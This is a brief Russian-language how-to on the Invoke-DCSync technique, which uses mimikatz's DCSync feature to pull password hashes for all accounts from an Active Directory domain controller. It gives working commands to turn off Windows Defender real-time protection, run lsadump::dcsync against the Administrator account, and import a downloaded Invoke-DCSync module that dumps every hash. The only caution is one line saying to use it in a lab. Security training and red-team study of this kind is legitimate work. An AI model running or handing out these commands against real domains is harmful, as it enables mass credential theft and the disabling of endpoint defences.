
Invoke-DCSync
Invoke-DCSync Ссылка: https://adsecurity.org/?p=1729 Ссылка: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ Цель: получить хэши паролей всех учетных записей пользователей на контроллере домена с помощью функции DCSync от mimikatz.
Предупреждение: Делайте это только в лабораторной среде.
mimikatz реализует инструмент под названием DCSync, который позволяет mimikatz выдавать себя за контроллер домена и пытаться получить все хэши паролей с другого контроллера домена.
Возможно, вам потребуется отключить Windows Defender.
Откройте PowerShell от имени администратора и введите
$ Set-MpPreference -DisableRealtimeMonitoring $true
Запустите mimikatz
$ lsadump::dcsync /domain:test.local /user:Administrator
Теперь у вас есть хэш пароля этого пользователя.
Для этого требуется доступ администратора, а именно атрибут Get-Replication-Changes-All Common Name.
Можно использовать модуль Invoke-DCSync для извлечения всех хэшей.
Скачать: https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat